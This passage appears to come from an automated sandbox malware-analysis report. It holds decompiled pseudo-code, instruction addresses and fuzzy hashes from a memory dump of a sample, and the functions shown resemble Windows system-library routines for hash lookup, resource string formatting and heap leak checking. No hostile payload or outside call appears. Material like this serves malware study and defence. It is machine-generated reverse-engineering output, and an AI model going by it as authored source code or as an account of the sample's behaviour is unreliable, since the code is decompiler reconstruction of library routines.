								_t31 = _t362 + 8; // 0x8
								_t314 = _t31;
								if(E1D81AC6F(_t31) == 0) {
									_t364 = 0;
								}
								E1D7452F0(_t314, _v24);
								goto L76;
							}
							_t21 = _t356 - 1; // 0x8bf8558a
							_t22 = _t375 + 8; // 0xc183f44d
							_t362 =  *_t22 + (_t21 & (_v13 & 0x000000ff) + 0x164b2f3f + (((_t267 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v14 & 0x000000ff)) * 0x00000025) * 4;
							_t267 = _v20;
							L21:
							_t336 = _v28;
							while(1) {
								_t362 =  *_t362;
								if((_t362 & 0x00000001) != 0) {
									break;
								}
								if(_t267 == ( *(_t362 + 4) & _t336)) {
									L26:
									if(_t362 == 0) {
										goto L34;
									}
									_t149 = E1D81ACB2(_t362, _v12);
									if(_t149 != 0) {
										goto L30;
									}
									goto L18;
								}
							}
							_t362 = 0;
							goto L26;
						}
					}
					_t368 = _t361 - 1;
					if(_t368 == 0) {
						L15:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L16;
					}
					_t369 = _t368 - 1;
					if(_t369 == 0) {
						L14:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L15;
					}
					_t370 = _t369 - 1;
					if(_t370 == 0) {
						L13:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L14;
					}
					_t371 = _t370 - 1;
					if(_t371 == 0) {
						L12:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L13;
					}
					_t372 = _t371 - 1;
					if(_t372 == 0) {
						L11:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L12;
					}
					if(_t372 != 1) {
						goto L17;
					} else {
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L11;
					}
				} else {
					_t358 = _t360 >> 3;
					_t360 = _t360 + _t358 * 0xfffffff8;
					do {
						_t333 = ((((((_t374[1] & 0x000000ff) * 0x25 + (_t374[2] & 0x000000ff)) * 0x25 + (_t374[3] & 0x000000ff)) * 0x25 + (_t374[4] & 0x000000ff)) * 0x25 + (_t374[5] & 0x000000ff)) * 0x25 + (_t374[6] & 0x000000ff)) * 0x25 - _t251 * 0x2fe8ed1f;
						_t261 = ( *_t374 & 0x000000ff) * 0x1a617d0d;
						_t250 = _t374[7] & 0x000000ff;
						_t374 =  &(_t374[8]);
						_t251 = _t261 + _t333 + _t250;
						_t358 = _t358 - 1;
					} while (_t358 != 0);
					goto L3;
				}
			}












































































                                                                                                                              0x1d81acf4
                                                                                                                              0x1d81acf6
                                                                                                                              0x1d81acfb
                                                                                                                              0x1d81acfe
                                                                                                                              0x1d81ad05
                                                                                                                              0x1d81ad05
                                                                                                                              0x1d81ad08
                                                                                                                              0x1d81ad0e
                                                                                                                              0x1d81ad6f
                                                                                                                              0x1d81ad6f
                                                                                                                              0x1d81ad72
                                                                                                                              0x1d81adc8
                                                                                                                              0x1d81adce
                                                                                                                              0x1d81add0
                                                                                                                              0x1d81add0
                                                                                                                              0x1d81add3
                                                                                                                              0x1d81add7
                                                                                                                              0x1d81adda
                                                                                                                              0x1d81addf
                                                                                                                              0x1d81ade1
                                                                                                                              0x1d81ade1
                                                                                                                              0x1d81ade1
                                                                                                                              0x1d81ade1
                                                                                                                              0x1d81adec
                                                                                                                              0x1d81adf0
                                                                                                                              0x1d81adf2
                                                                                                                              0x1d81adf5
                                                                                                                              0x1d81adf8
                                                                                                                              0x1d81adfd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81adff
                                                                                                                              0x1d81ae04
                                                                                                                              0x1d81ae69
                                                                                                                              0x1d81ae6b
                                                                                                                              0x1d81ae6d
                                                                                                                              0x1d81ae8b
                                                                                                                              0x1d81ae8b
                                                                                                                              0x1d81ae8f
                                                                                                                              0x1d81ae97
                                                                                                                              0x1d81ae9a
                                                                                                                              0x1d81aea9
                                                                                                                              0x1d81aeb1
                                                                                                                              0x1d81aeb3
                                                                                                                              0x1d81aeb8
                                                                                                                              0x1d81aec8
                                                                                                                              0x1d81aec9
                                                                                                                              0x1d81aeca
                                                                                                                              0x1d81aed6
                                                                                                                              0x1d81aedb
                                                                                                                              0x1d81aede
                                                                                                                              0x1d81aeea
                                                                                                                              0x1d81aef9
                                                                                                                              0x1d81aefe
                                                                                                                              0x1d81af01
                                                                                                                              0x1d81af03
                                                                                                                              0x1d81af03
                                                                                                                              0x1d81af03
                                                                                                                              0x1d81af0e
                                                                                                                              0x1d81af12
                                                                                                                              0x1d81af15
                                                                                                                              0x1d81af17
                                                                                                                              0x1d81af1a
                                                                                                                              0x1d81af1f
                                                                                                                              0x1d81af5b
                                                                                                                              0x1d81af5b
                                                                                                                              0x1d81af5e
                                                                                                                              0x1d81af5e
                                                                                                                              0x1d81af66
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81af6f
                                                                                                                              0x1d81af75
                                                                                                                              0x1d81af77
                                                                                                                              0x1d81afae
                                                                                                                              0x1d81afae
                                                                                                                              0x1d81afb0
                                                                                                                              0x1d81afb3
                                                                                                                              0x1d81afb3
                                                                                                                              0x1d81afb6
                                                                                                                              0x1d81afb6
                                                                                                                              0x1d81afb9
                                                                                                                              0x1d81afbc
                                                                                                                              0x1d81afbf
                                                                                                                              0x1d81afc4
                                                                                                                              0x1d81afcc
                                                                                                                              0x1d81b11b
                                                                                                                              0x1d81b128
                                                                                                                              0x1d81b12d
                                                                                                                              0x1d81b12f
                                                                                                                              0x1d81b132
                                                                                                                              0x1d81b135
                                                                                                                              0x1d81b15e
                                                                                                                              0x1d81b160
                                                                                                                              0x1d81b160
                                                                                                                              0x1d81b166
                                                                                                                              0x1d81b168
                                                                                                                              0x1d81b16b
                                                                                                                              0x1d81b16d
                                                                                                                              0x1d81b16f
                                                                                                                              0x1d81b16f
                                                                                                                              0x1d81b173
                                                                                                                              0x1d81b17a
                                                                                                                              0x1d81b17c
                                                                                                                              0x1d81b180
                                                                                                                              0x1d81b185
                                                                                                                              0x1d81b18b
                                                                                                                              0x1d81b18b
                                                                                                                              0x1d81b18d
                                                                                                                              0x1d81b193
                                                                                                                              0x1d81b193
                                                                                                                              0x1d81afd4
                                                                                                                              0x1d81afdc
                                                                                                                              0x1d81afe3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81afe9
                                                                                                                              0x1d81afef
                                                                                                                              0x1d81aff3
                                                                                                                              0x1d81aff3
                                                                                                                              0x1d81afff
                                                                                                                              0x1d81b005
                                                                                                                              0x1d81b007
                                                                                                                              0x1d81b009
                                                                                                                              0x1d81b00e
                                                                                                                              0x1d81b194
                                                                                                                              0x1d81b194
                                                                                                                              0x1d81b19a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81b1a0
                                                                                                                              0x1d81b1a3
                                                                                                                              0x00000000
                                                                                                                              0x1d81b014
                                                                                                                              0x1d81b014
                                                                                                                              0x1d81b014
                                                                                                                              0x1d81b019
                                                                                                                              0x1d81b02c
                                                                                                                              0x1d81b033
                                                                                                                              0x1d81b035
                                                                                                                              0x1d81b035
                                                                                                                              0x1d81b03a
                                                                                                                              0x1d81b03c
                                                                                                                              0x1d81b049
                                                                                                                              0x1d81b052
                                                                                                                              0x1d81b056
                                                                                                                              0x1d81b058
                                                                                                                              0x1d81b067
                                                                                                                              0x1d81b067
                                                                                                                              0x1d81b070
                                                                                                                              0x1d81b07b
                                                                                                                              0x1d81b07e
                                                                                                                              0x1d81b0ec
                                                                                                                              0x1d81b0ec
                                                                                                                              0x1d81b0ec
                                                                                                                              0x1d81b0f2
                                                                                                                              0x1d81b0f5
                                                                                                                              0x1d81b0fb
                                                                                                                              0x1d81b0fe
                                                                                                                              0x1d81b100
                                                                                                                              0x1d81b105
                                                                                                                              0x1d81b110
                                                                                                                              0x1d81b116
                                                                                                                              0x1d81b118
                                                                                                                              0x1d81b118
                                                                                                                              0x1d81b118
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81b080
                                                                                                                              0x1d81b080
                                                                                                                              0x1d81b080
                                                                                                                              0x1d81b080
                                                                                                                              0x1d81b083
                                                                                                                              0x1d81b086
                                                                                                                              0x1d81b086
                                                                                                                              0x1d81b089
                                                                                                                              0x1d81b092
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81b096
                                                                                                                              0x1d81b09c
                                                                                                                              0x1d81b0a7
                                                                                                                              0x1d81b0b0
                                                                                                                              0x1d81b0ca
                                                                                                                              0x1d81b0cc
                                                                                                                              0x1d81b0d2
                                                                                                                              0x1d81b0d6
                                                                                                                              0x1d81b0d9
                                                                                                                              0x1d81b0d9
                                                                                                                              0x1d81b0de
                                                                                                                              0x1d81b0de
                                                                                                                              0x1d81b0e1
                                                                                                                              0x1d81b0e2
                                                                                                                              0x1d81b0e8
                                                                                                                              0x00000000
                                                                                                                              0x1d81b05a
                                                                                                                              0x1d81b05a
                                                                                                                              0x1d81b05d
                                                                                                                              0x1d81b05d
                                                                                                                              0x1d81b05e
                                                                                                                              0x1d81b060
                                                                                                                              0x1d81b063
                                                                                                                              0x00000000
                                                                                                                              0x1d81b05d
                                                                                                                              0x1d81b058
                                                                                                                              0x1d81b01b
                                                                                                                              0x1d81b020
                                                                                                                              0x1d81b027
                                                                                                                              0x1d81b02a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81b022
                                                                                                                              0x1d81b022
                                                                                                                              0x1d81b022
                                                                                                                              0x1d81b023
                                                                                                                              0x1d81b023
                                                                                                                              0x00000000
                                                                                                                              0x1d81b022
                                                                                                                              0x1d81b00e
                                                                                                                              0x00000000
                                                                                                                              0x1d81af77
                                                                                                                              0x1d81af71
                                                                                                                              0x1d81af73
                                                                                                                              0x00000000
                                                                                                                              0x1d81af73
                                                                                                                              0x1d81af21
                                                                                                                              0x1d81af26
                                                                                                                              0x1d81af8c
                                                                                                                              0x1d81af8e
                                                                                                                              0x1d81af90
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81af92
                                                                                                                              0x1d81af95
                                                                                                                              0x1d81af9a
                                                                                                                              0x1d81af9c
                                                                                                                              0x1d81afa1
                                                                                                                              0x1d81afa7
                                                                                                                              0x1d81afa7
                                                                                                                              0x00000000
                                                                                                                              0x1d81afa1
                                                                                                                              0x1d81af4d
                                                                                                                              0x1d81af52
                                                                                                                              0x1d81af55
                                                                                                                              0x1d81af58
                                                                                                                              0x00000000
                                                                                                                              0x1d81af79
                                                                                                                              0x1d81af7d
                                                                                                                              0x1d81af82
                                                                                                                              0x00000000
                                                                                                                              0x1d81af8a
                                                                                                                              0x1d81aeba
                                                                                                                              0x00000000
                                                                                                                              0x1d81aeba
                                                                                                                              0x1d81ae6f
                                                                                                                              0x1d81ae6f
                                                                                                                              0x1d81ae79
                                                                                                                              0x1d81ae7b
                                                                                                                              0x1d81ae7b
                                                                                                                              0x1d81ae81
                                                                                                                              0x00000000
                                                                                                                              0x1d81ae81
                                                                                                                              0x1d81ae2b
                                                                                                                              0x1d81ae30
                                                                                                                              0x1d81ae33
                                                                                                                              0x1d81ae36
                                                                                                                              0x1d81ae39
                                                                                                                              0x1d81ae39
                                                                                                                              0x1d81ae3c
                                                                                                                              0x1d81ae3c
                                                                                                                              0x1d81ae44
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81ae4d
                                                                                                                              0x1d81ae53
                                                                                                                              0x1d81ae55
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81ae5b
                                                                                                                              0x1d81ae62
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81ae64
                                                                                                                              0x1d81ae4f
                                                                                                                              0x1d81ae51
                                                                                                                              0x00000000
                                                                                                                              0x1d81ae51
                                                                                                                              0x1d81ade1
                                                                                                                              0x1d81ad74
                                                                                                                              0x1d81ad77
                                                                                                                              0x1d81adbf
                                                                                                                              0x1d81adc5
                                                                                                                              0x1d81adc7
                                                                                                                              0x00000000
                                                                                                                              0x1d81adc7
                                                                                                                              0x1d81ad79
                                                                                                                              0x1d81ad7c
                                                                                                                              0x1d81adb6
                                                                                                                              0x1d81adbc
                                                                                                                              0x1d81adbe
                                                                                                                              0x00000000
                                                                                                                              0x1d81adbe
                                                                                                                              0x1d81ad7e
                                                                                                                              0x1d81ad81
                                                                                                                              0x1d81adad
                                                                                                                              0x1d81adb3
                                                                                                                              0x1d81adb5
                                                                                                                              0x00000000
                                                                                                                              0x1d81adb5
                                                                                                                              0x1d81ad83
                                                                                                                              0x1d81ad86
                                                                                                                              0x1d81ada4
                                                                                                                              0x1d81adaa
                                                                                                                              0x1d81adac
                                                                                                                              0x00000000
                                                                                                                              0x1d81adac
                                                                                                                              0x1d81ad88
                                                                                                                              0x1d81ad8b
                                                                                                                              0x1d81ad9b
                                                                                                                              0x1d81ada1
                                                                                                                              0x1d81ada3
                                                                                                                              0x00000000
                                                                                                                              0x1d81ada3
                                                                                                                              0x1d81ad90
                                                                                                                              0x00000000
                                                                                                                              0x1d81ad92
                                                                                                                              0x1d81ad98
                                                                                                                              0x1d81ad9a
                                                                                                                              0x00000000
                                                                                                                              0x1d81ad9a
                                                                                                                              0x1d81ad10
                                                                                                                              0x1d81ad12
                                                                                                                              0x1d81ad18
                                                                                                                              0x1d81ad1a
                                                                                                                              0x1d81ad54
                                                                                                                              0x1d81ad59
                                                                                                                              0x1d81ad5f
                                                                                                                              0x1d81ad63
                                                                                                                              0x1d81ad68
                                                                                                                              0x1d81ad6a
                                                                                                                              0x1d81ad6a
                                                                                                                              0x00000000
                                                                                                                              0x1d81ad1a

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 54223f12763e66db29e6c84ec9eabd048638c6bc6fba7c8870b9e0ae5d66f20c
                                                                                                                              • Instruction ID: d033486c2cbc603edd95349ed51607117ddf0cce0e15d090523e1b882a721a13
                                                                                                                              • Opcode Fuzzy Hash: 54223f12763e66db29e6c84ec9eabd048638c6bc6fba7c8870b9e0ae5d66f20c
                                                                                                                              • Instruction Fuzzy Hash: E5F1E772E006169FCB08CF68C99067EFBF5EF89210B1A816DE45ADF390D634EA45CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7CF9AA Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E1D7CF9AA(intOrPtr __ecx, signed int __edx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v140;
				char _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				char* _v680;
				signed short _v684;
				intOrPtr _v688;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				void* _t42;
				void* _t58;
				signed char* _t59;
				signed int* _t66;
				signed char* _t75;
				void* _t77;
				void* _t80;
				signed int _t81;
				void* _t82;

				_t74 = __edx;
				_v8 =  *0x1d83b370 ^ _t81;
				_t39 = __ecx;
				_v676 = L"Type:";
				_t78 = 0;
				_v688 = __ecx;
				_t66 = __edx;
				_v672 = L" Name:";
				_t68 = 0x208;
				_v668 = L" Language:";
				_t75 = 0x7ffe0384;
				_v664 = L" Item:";
				if((_a8 & 0x0000000e) == 0) {
					L10:
					if((_a8 & 0x00000001) != 0) {
						_t74 =  &_v660;
						_t71 = _t39;
						_t42 = E1D7CF85C(_t39,  &_v660, _t68, _t78, _t78, _t78, _t78);
						_t78 = _t42;
						if(_t42 >= 0) {
							E1D785050(_t71,  &_v684,  &_v660);
							if(E1D753C40() != 0) {
								_t75 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_t74 =  *_t75 & 0x000000ff;
							E1D7CFC01( &_v684,  *_t75 & 0x000000ff);
						}
					}
					return E1D784B50(_t78, _t66, _v8 ^ _t81, _t74, _t75, _t78);
				}
				_v684 = 0x2080000;
				_v680 =  &_v660;
				_t77 = 0;
				E1D74FE40(0x208,  &_v684, L"SR - ");
				_t80 =  &_v676 - _t66;
				do {
					E1D74FE40(_t68,  &_v684,  *((intOrPtr*)(_t80 + _t66)));
					_t54 =  *_t66;
					if(( *_t66 & 0xffff0000) == 0 || _t77 == 3) {
						_t68 =  &_v140;
						E1D78F3C0(_t54,  &_v140, 0x40, 0xa);
						_t82 = _t82 + 0x10;
						_t54 =  &_v140;
					}
					E1D74FE40(_t68,  &_v684, _t54);
					_t77 = _t77 + 1;
					_t66 =  &(_t66[1]);
				} while (_t77 < _a4);
				_t58 = E1D753C40();
				_t75 = 0x7ffe0384;
				if(_t58 == 0) {
					_t59 = 0x7ffe0384;
				} else {
					_t59 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				_t74 =  *_t59 & 0x000000ff;
				E1D7CFC01( &_v684,  *_t59 & 0x000000ff);
				_t78 = 0;
				E1D788F40( &_v660, 0, _v684 & 0x0000ffff);
				_t39 = _v688;
				_t68 = 0x208;
				goto L10;
			}


























                                                                                                                              0x1d7cf9aa
                                                                                                                              0x1d7cf9bc
                                                                                                                              0x1d7cf9c1
                                                                                                                              0x1d7cf9c3
                                                                                                                              0x1d7cf9cd
                                                                                                                              0x1d7cf9cf
                                                                                                                              0x1d7cf9d9
                                                                                                                              0x1d7cf9dc
                                                                                                                              0x1d7cf9e6
                                                                                                                              0x1d7cf9eb
                                                                                                                              0x1d7cf9f5
                                                                                                                              0x1d7cf9fa
                                                                                                                              0x1d7cfa04
                                                                                                                              0x1d7cfadb
                                                                                                                              0x1d7cfadf
                                                                                                                              0x1d7cfae6
                                                                                                                              0x1d7cfaec
                                                                                                                              0x1d7cfaee
                                                                                                                              0x1d7cfaf3
                                                                                                                              0x1d7cfaf7
                                                                                                                              0x1d7cfb07
                                                                                                                              0x1d7cfb13
                                                                                                                              0x1d7cfb1e
                                                                                                                              0x1d7cfb1e
                                                                                                                              0x1d7cfb24
                                                                                                                              0x1d7cfb2d
                                                                                                                              0x1d7cfb2d
                                                                                                                              0x1d7cfaf7
                                                                                                                              0x1d7cfb42
                                                                                                                              0x1d7cfb42
                                                                                                                              0x1d7cfa10
                                                                                                                              0x1d7cfa1a
                                                                                                                              0x1d7cfa20
                                                                                                                              0x1d7cfa2e
                                                                                                                              0x1d7cfa39
                                                                                                                              0x1d7cfa3b
                                                                                                                              0x1d7cfa45
                                                                                                                              0x1d7cfa4a
                                                                                                                              0x1d7cfa51
                                                                                                                              0x1d7cfa5c
                                                                                                                              0x1d7cfa64
                                                                                                                              0x1d7cfa69
                                                                                                                              0x1d7cfa6c
                                                                                                                              0x1d7cfa6c
                                                                                                                              0x1d7cfa7a
                                                                                                                              0x1d7cfa7f
                                                                                                                              0x1d7cfa80
                                                                                                                              0x1d7cfa83
                                                                                                                              0x1d7cfa88
                                                                                                                              0x1d7cfa8d
                                                                                                                              0x1d7cfa94
                                                                                                                              0x1d7cfaa6
                                                                                                                              0x1d7cfa96
                                                                                                                              0x1d7cfa9f
                                                                                                                              0x1d7cfa9f
                                                                                                                              0x1d7cfaa8
                                                                                                                              0x1d7cfab1
                                                                                                                              0x1d7cfabd
                                                                                                                              0x1d7cfac8
                                                                                                                              0x1d7cfacd
                                                                                                                              0x1d7cfad6
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Item:$ Language:$ Name:$SR - $Type:
                                                                                                                              • API String ID: 0-3082644519
                                                                                                                              • Opcode ID: e97deb57623cd88d00e13a2a92f4ff0494d4c13a06a58e8423606ef5d260aa37
                                                                                                                              • Instruction ID: 83d14773640542d732c1af804f2aa16dc756b6cde7d383839a79c8f65d64571d
                                                                                                                              • Opcode Fuzzy Hash: e97deb57623cd88d00e13a2a92f4ff0494d4c13a06a58e8423606ef5d260aa37
                                                                                                                              • Instruction Fuzzy Hash: 6D41A272A011699FCB20CB64DC4CBDEF7BDAF46324F4141DAA549A7251DF30AE848F52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D76D8F0 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 44%
                                                                                                                              			E1D76D8F0() {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t55;
				char* _t56;
				void* _t58;
				signed int _t68;
				void* _t70;
				signed int _t71;

				_t25 =  *[fs:0x30];
				if(( *(_t25 + 0x68) & 0x00000100) != 0) {
					L4:
					return _t25;
				}
				_t25 =  *[fs:0x30];
				if(( *(_t25 + 0x68) & 0x02000000) != 0 ||  *0x1d834898 == 0 && ( *0x1d836944 & 0x00000003) == 0) {
					goto L4;
				} else {
					 *0x1d836d5c = 0;
					_t25 = E1D750F90(_t55, 0, _t70, __eflags, 3, 0, 0, 0, 0, 0);
					 *0x1d8347d8 = _t25;
					__eflags = _t25;
					if(_t25 == 0) {
						goto L4;
					}
					_t71 =  *[fs:0x30];
					_t56 = "HEAP: ";
					_t26 =  *[fs:0x30];
					__eflags =  *(_t26 + 0xc);
					if( *(_t26 + 0xc) == 0) {
						_push(_t56);
						E1D73B910();
					} else {
						E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("Inspecting leaks at process shutdown ...\n");
					E1D73B910();
					_pop(_t58);
					_t29 = E1D7EE993(_t58, _t68);
					__eflags = _t29;
					if(_t29 != 0) {
						 *0x1d836d58 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x90)) +  *(_t71 + 0x88) * 4 - 4));
						E1D7EEC84();
						E1D7EEE54(_t56, 0, _t71, __eflags);
						E1D73F8B0(_t68,  *0x1d8347d8);
						_t35 =  *[fs:0x30];
						 *0x1d8347d8 = 0;
						__eflags =  *0x1d836d5c; // 0x0
						if(__eflags == 0) {
							__eflags =  *(_t35 + 0xc);
							if( *(_t35 + 0xc) == 0) {
								_push(_t56);
								E1D73B910();
							} else {
								E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("No leaks detected.\n");
							return E1D73B910();
						}
						__eflags =  *(_t35 + 0xc);
						if( *(_t35 + 0xc) == 0) {
							_push(_t56);
							E1D73B910();
						} else {
							E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_t25 = E1D73B910("%ld leaks detected.\n",  *0x1d836d5c);
						__eflags =  *0x1d836944 & 0x00000002;
						if(( *0x1d836944 & 0x00000002) == 0) {
							goto L4;
						} else {
							asm("int3");
							return _t25;
						}
					} else {
						return E1D73F8B0(_t68,  *0x1d8347d8);
					}
				}
			}
















                                                                                                                              0x1d76d8f0
                                                                                                                              0x1d76d900
                                                                                                                              0x1d76d92e
                                                                                                                              0x1d76d92e
                                                                                                                              0x1d76d92e
                                                                                                                              0x1d76d902
                                                                                                                              0x1d76d90f
                                                                                                                              0x00000000
                                                                                                                              0x1d7af16f
                                                                                                                              0x1d7af178
                                                                                                                              0x1d7af17e
                                                                                                                              0x1d7af183
                                                                                                                              0x1d7af188
                                                                                                                              0x1d7af18a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af190
                                                                                                                              0x1d7af197
                                                                                                                              0x1d7af19c
                                                                                                                              0x1d7af1a2
                                                                                                                              0x1d7af1a5
                                                                                                                              0x1d7af1c4
                                                                                                                              0x1d7af1c5
                                                                                                                              0x1d7af1a7
                                                                                                                              0x1d7af1bc
                                                                                                                              0x1d7af1c1
                                                                                                                              0x1d7af1cb
                                                                                                                              0x1d7af1d0
                                                                                                                              0x1d7af1d5
                                                                                                                              0x1d7af1d6
                                                                                                                              0x1d7af1db
                                                                                                                              0x1d7af1dd
                                                                                                                              0x1d7af1ff
                                                                                                                              0x1d7af204
                                                                                                                              0x1d7af209
                                                                                                                              0x1d7af214
                                                                                                                              0x1d7af219
                                                                                                                              0x1d7af21f
                                                                                                                              0x1d7af225
                                                                                                                              0x1d7af22b
                                                                                                                              0x1d7af27b
                                                                                                                              0x1d7af27e
                                                                                                                              0x1d7af29d
                                                                                                                              0x1d7af29e
                                                                                                                              0x1d7af280
                                                                                                                              0x1d7af295
                                                                                                                              0x1d7af29a
                                                                                                                              0x1d7af2a4
                                                                                                                              0x00000000
                                                                                                                              0x1d7af2ae
                                                                                                                              0x1d7af22d
                                                                                                                              0x1d7af230
                                                                                                                              0x1d7af24f
                                                                                                                              0x1d7af250
                                                                                                                              0x1d7af232
                                                                                                                              0x1d7af247
                                                                                                                              0x1d7af24c
                                                                                                                              0x1d7af261
                                                                                                                              0x1d7af266
                                                                                                                              0x1d7af26f
                                                                                                                              0x00000000
                                                                                                                              0x1d7af275
                                                                                                                              0x1d7af275
                                                                                                                              0x00000000
                                                                                                                              0x1d7af275
                                                                                                                              0x1d7af1df
                                                                                                                              0x00000000
                                                                                                                              0x1d7af1e5
                                                                                                                              0x1d7af1dd

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: %ld leaks detected.$HEAP: $HEAP[%wZ]: $Inspecting leaks at process shutdown ...$No leaks detected.
                                                                                                                              • API String ID: 0-1155200129
                                                                                                                              • Opcode ID: b38b96d301b265a377a2c2650eac31f39d70d47417473c6d4da641aafc4904e6
                                                                                                                              • Instruction ID: e793c5b7f29a7f2e78cf3dff07d4b36e10478e5a2e5506056e90da70a3b65bae
                                                                                                                              • Opcode Fuzzy Hash: b38b96d301b265a377a2c2650eac31f39d70d47417473c6d4da641aafc4904e6
                                                                                                                              • Instruction Fuzzy Hash: 4C31A23E125645EFD3129B1DD888F2573F4EB49A75F07484AE9084B6A7EA35A880CA13
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7458E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 58%
                                                                                                                              			E1D7458E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
